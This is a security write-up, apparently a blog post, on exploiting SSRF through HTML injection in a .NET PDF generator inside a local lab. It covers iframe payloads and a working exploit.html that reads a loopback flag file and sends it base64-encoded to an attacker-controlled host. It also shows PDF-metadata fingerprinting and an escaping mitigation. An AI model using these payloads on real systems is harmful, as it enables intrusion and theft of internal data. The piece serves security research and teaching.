Exploiting SSRF in PDF HTML Injection: Basic and Blind

On a recent application assessment, I encountered an endpoint that would take HTML from user input and generate a PDF from it. I knew that it was possible to perform SSRF by inserting an iframe, but I wanted to know how this could be abused in more complex scenarios. How about resources on different servers? How does CORS affect exploitation? What if I didn’t have access to the response? I started exploring these in a bit more depth. This article is a brief overview of my findings, a simple lab setup, and some exploit examples.

Want to discuss it? I can be found on Twitter @JowardBince.

Necessary disclaimer: this research is purely academic. Do not attempt any of these techniques on assets or applications that you do not have explicit permission to test.

A Brief Overview of SSRF & PDF Generation

For those unfamiliar, Server-Side Request Forgery (SSRF) is a class of vulnerabilities in which an attacker can coerce a vulnerable server into making a request on the attacker’s behalf. This could allow an attacker to access internal resources, restricted portions of the application, and perhaps compromise the application itself. A common example is using SSRF to request information from cloud metadata services (see HackTricks: Cloud SSRF for more details).

SSRF generally comes in two flavors: full read and blind. A full read SSRF returns the content of the response from the request to the attacker. Alternatively, blind SSRF does not return the content of the response.

How can this be applied to PDF generation? Often, web applications will use user input in the creation of a PDF. How the PDF and user input are rendered depends heavily on the library being used. However, many applications use HTML elements to easily format and lay out the PDF. Therefore, if user input is being rendered in the PDF, it may be possible to insert new HTML elements. When the PDF is being generated server-side, the app will make requests to remote resources as necessary to ensure that all of the HTML content included in the PDF is rendered properly in the final document. Therefore, if a user can insert an HTML element with a remote source, the server will make a request to that resource when the PDF is generated: SSRF.
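
To make the injection concrete, here is a minimal sketch in JavaScript of a server-side template that places user input into the HTML that is later converted to a PDF. The function names (renderReportHtml, escapeHtml), the template, and the ping.png path are hypothetical and are not taken from any real application or from the lab below. They only illustrate why unescaped input becomes a new element with a remote source.

```javascript
// Hypothetical template: user input is concatenated straight into the HTML
// that a PDF converter would later render.
function renderReportHtml(customerName) {
  return '<html><body><h1>Report for ' + customerName + '</h1></body></html>';
}

// Escaping the HTML metacharacters turns injected markup into inert text.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Illustrative input containing an element with a remote source.
const input = '<img src="http://192.168.0.131/ping.png">';

// Unescaped: the output contains a real <img> element with a remote source.
console.log(renderReportHtml(input));

// Escaped: the same input appears only as literal text.
console.log(renderReportHtml(escapeHtml(input)));
```

The first output is what makes SSRF possible: a converter that resolves remote sources would request the image while rendering. The second shows the usual mitigation, which is to encode user input before it reaches the template.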

The Lab

To demonstrate the principles behind SSRF in PDF generation, I’ve set up a simple web application and local lab. The application uses HiQPdf, a common .NET library used to turn HTML into PDFs. The home page is set up to take HTML from a POST form.

The code that processes the HTML is only three lines. It creates a new HtmlToPdf converter, saves the value of the html POST data in a variable called pdfBuffer, and uses the converter to create a PDF that is returned to the user as mypdf.pdf.

This application is running on a Windows 10 host at the local address 192.168.0.133. I also have a second Kali host on the same subnet to demonstrate remote exploitation at the address 192.168.0.131.

Finally, there is a second web server running on 127.0.0.1:80 on the Windows host with a flag.txt document at its root. This will be our target.

Full Read Exploitation

In our lab, we know that the application is vulnerable to HTML injection. In this first example, we’ll be able to see the final PDF and all of the elements we insert. This is an easy scenario to exploit, as we only need to select an HTML element that will render the webpage we want to see, the simplest choice being an <iframe>.

When we set the source of the iframe to the desired resource, the server requests that resource while generating the PDF, and the full response is rendered in the document we receive.

This is an extremely straightforward scenario. But what if we can’t see the full response?
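
The payload itself is not reproduced in the text, so the following is a minimal sketch of what such an iframe could look like. The helper name buildIframePayload and the width and height values are assumptions chosen for illustration. The target URL is the flag on the lab's loopback web server.

```javascript
// Build an <iframe> whose source is the resource we want the server to fetch.
// The dimensions are arbitrary; they only need to be large enough for the
// response to be legible in the generated PDF.
function buildIframePayload(targetUrl, width = 800, height = 400) {
  return `<iframe src="${targetUrl}" width="${width}" height="${height}"></iframe>`;
}

const payload = buildIframePayload('http://127.0.0.1/flag.txt');
console.log(payload);
// <iframe src="http://127.0.0.1/flag.txt" width="800" height="400"></iframe>
```

Submitting this string through the lab's HTML form should produce a PDF with the contents of flag.txt rendered inside the frame.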

Blind Exploitation

There are a few situations where we may not receive the response. Perhaps the PDF is generated and the content isn’t rendered clearly, or it may be placed in a location inaccessible to the user. In any case, it’s possible to send requests to remote resources but we’ll need a new way to get the response.

To outline the concept, we want the exploit to work something like this:

1. We’ll host an HTML document on a server we control that contains in-line JavaScript.
2. The JavaScript will first send a request to the flag hosted on the machine locally.
3. It will save the content of this response.
4. It will then send the content of that response back to us in the form of a URL query string to a server we control.
5. When we coerce the vulnerable server into accessing this page, the JavaScript it contains will be executed by the PDF generating framework, thus retrieving and sending data back to us without us ever seeing the final PDF.

There are two important caveats to consider here. First, we need to consider the CORS policy of the resource we want the server to query. Covering the specifics of CORS is beyond the scope of this article, but PortSwigger has a great explanation of it and of related vulnerabilities. In the case of blind SSRF exploitation, we want the server to make a request to the remote resource and save the response. Because our script runs from a page hosted on our own server, its request for the flag is cross-origin, so the script can only read the response if the remote resource has a relaxed CORS policy. For the sake of this example, our flag is hosted on a web server that has an open policy, where any origin may read the content of the response.
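
As a rough illustration of the check that a CORS-enforcing renderer applies, the sketch below decides whether a script may read a cross-origin response based on the Access-Control-Allow-Origin header. It is a simplification that ignores credentials, preflight requests, and the other CORS headers, and the function name canReadResponse is hypothetical. It assumes the exploit page is served from http://192.168.0.131, as in the lab.

```javascript
// Simplified CORS read check for a request made without credentials.
// pageOrigin:  origin of the page whose script made the request
// targetUrl:   URL that was requested
// allowOrigin: value of the Access-Control-Allow-Origin response header,
//              or null if the header is absent
function canReadResponse(pageOrigin, targetUrl, allowOrigin) {
  // Same-origin responses are always readable.
  if (new URL(targetUrl).origin === pageOrigin) return true;
  // Cross-origin responses need an explicit grant from the target server.
  return allowOrigin === '*' || allowOrigin === pageOrigin;
}

const exploitOrigin = 'http://192.168.0.131';
const flagUrl = 'http://127.0.0.1/flag.txt';

console.log(canReadResponse(exploitOrigin, flagUrl, '*'));                  // true
console.log(canReadResponse(exploitOrigin, flagUrl, null));                 // false
console.log(canReadResponse(exploitOrigin, flagUrl, 'http://example.com')); // false
```

Only the first case, which matches the open policy on the lab's flag server, lets the script read the response body. In the other two cases the request is still sent, but the script cannot save the content.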

Second, we need to know whether the PDF framework that processes the HTML also executes JavaScript within it. It’s possible that it renders only the HTML but not any in-line scripts. This is wholly dependent on the framework in use.

Hint: if you’re ever testing this on an application assessment or on a bug bounty target, you can often find the name of the framework in the metadata of PDFs created by the application.
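
As a sketch of that hint, the snippet below searches the raw bytes of a PDF for the Producer and Creator entries of its Info dictionary, which is where many generators record their name. The function name extractPdfGenerator and the sample values are hypothetical. The approach is deliberately naive: it only finds uncompressed literal strings and will miss metadata stored in compressed object streams, hex strings, or XMP.

```javascript
// Pull the Producer and Creator entries out of a PDF's Info dictionary.
// This only finds plain literal strings, e.g. "/Producer (Some Library 1.0)".
function extractPdfGenerator(pdfBytes) {
  const text = Buffer.from(pdfBytes).toString('latin1');
  const pattern = /\/(Producer|Creator)\s*\(((?:\\.|[^\\)])*)\)/g;
  const found = {};
  for (const match of text.matchAll(pattern)) {
    found[match[1]] = match[2];
  }
  return found;
}

// Hypothetical fragment of a PDF; the library and application names are made up.
const sample = Buffer.from(
  '1 0 obj\n<< /Producer (ExamplePdfLib 1.0) /Creator (ExampleApp) >>\nendobj\n',
  'latin1'
);
console.log(extractPdfGenerator(sample));
```

In practice the bytes would come from a downloaded file, for example via fs.readFileSync, and a dedicated tool such as exiftool or pdfinfo will report the same fields more robustly.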

Fortunately, HiQPdf does execute JavaScript. If we create an iframe that renders a remote HTML page, the server will also execute the JavaScript on that page.

With all of that in mind, we can effectively write an exploit. Our HTML document is as follows:

exploit.html

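<html>
<body>
<script>
  // Step 1: request the flag from the server's own loopback interface.
  // The request is synchronous so the PDF generator waits for the response.
  const xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://127.0.0.1/flag.txt', false);
  xhr.send();

  if (xhr.status === 200) {
    // Step 2: base64 encode the response, then URL-encode it so that
    // '+' and '=' characters survive in the query string.
    const responseData = xhr.responseText;
    const url = 'http://192.168.0.131/?exfil=' + encodeURIComponent(btoa(responseData));

    // Step 3: send the encoded data to the server we control.
    const xhr2 = new XMLHttpRequest();
    xhr2.open('GET', url, false); // Synchronous request
    xhr2.setRequestHeader('Content-Type', 'text/plain');
    xhr2.send();
  }
</script>
</body>
</html>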

Let’s walk through this briefly. The first section sends a GET request to the locally hosted flag using XMLHttpRequest(). The request itself must be synchronous. If it is not, then the PDF generator will send the request but it will not wait for the response. That makes the second step impossible to execute reliably.

The next section then checks if the first request was met with a 200 response code. If so, it saves the content of the response in a variable called responseData. The response data is then encoded in base64, to ensure that it can be reliably sent, and appended as a query string to the URL of a server we control. The vulnerable server then queries that URL.

Now we’ll do the exact same thing we did in the full read exploit and create an iframe. This time, the requested resource will be our exploit file instead of the flag.

We start our web server, and send the request. We receive two requests from the vulnerable server: one for our exploit, and the other with base64 encoded data! We decode the data, and have the value of the flag. We’ve successfully exploited blind SSRF to retrieve an inaccessible resource without ever having access to the PDF.
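
The decoding step can be sketched as follows. This is a minimal helper, assuming the request path has been copied out of the web server's access log. The function name decodeExfil and the sample flag value are hypothetical and are not the lab's real data.

```javascript
// Extract and decode the "exfil" parameter from a logged request path.
function decodeExfil(requestPath) {
  const match = /[?&]exfil=([^&\s]*)/.exec(requestPath);
  if (!match) return null;
  // Undo any percent-encoding first. decodeURIComponent leaves '+' alone,
  // which matters because '+' is a valid base64 character.
  const base64 = decodeURIComponent(match[1]);
  // btoa() encodes one byte per character, so latin1 is its exact inverse.
  return Buffer.from(base64, 'base64').toString('latin1');
}

// Build a sample request path from a made-up flag value.
const encoded = encodeURIComponent(
  Buffer.from('flag{example}', 'latin1').toString('base64')
);
console.log(decodeExfil('/?exfil=' + encoded));
// flag{example}
```

The query string is parsed by hand rather than with URLSearchParams because the latter treats '+' as a space, which would corrupt base64 data that was sent without percent-encoding.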

Conclusion

While SSRF is common in PDF generation, actual exploitation techniques may vary. Exploitation can depend heavily on the framework and language in use, whether the vulnerability is full read or blind, and the CORS policy of the desired resource. With that in mind, it’s still possible to take an incremental and novel approach to exploit these vulnerabilities.
